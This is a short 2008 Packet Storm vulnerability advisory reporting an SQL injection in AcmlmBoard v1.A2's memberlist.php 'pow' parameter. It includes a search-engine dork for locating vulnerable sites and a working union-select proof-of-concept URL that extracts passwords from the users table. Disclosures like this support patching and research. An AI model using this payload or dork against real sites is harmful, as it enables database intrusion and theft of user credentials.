acmlmboard-sql.txt

2008-06-30T00:00:00
ID PACKETSTORM:67786
Type packetstorm
Reporter h0yt3r
Modified 2008-06-30T00:00:00

Description

                                        
                                            `  
######################  
#  
#AcmlmBoard v1.A2 SQL Injection Vulnerability  
#  
######################  
#  
#Bug by: h0yt3r  
#  
#Dork: "AcmlmBoard v1.A2"  
#  
##  
###  
##  
#  
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.  
#An Attacker can easily get sensitive information from the database by  
#injecting unexpected SQL Querys.  
#  
#SQL Injection:  
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]  
#  
#PoC:  
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+  
#  
#######################  
#  
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!  
#  
#######################  
#######################  
  
`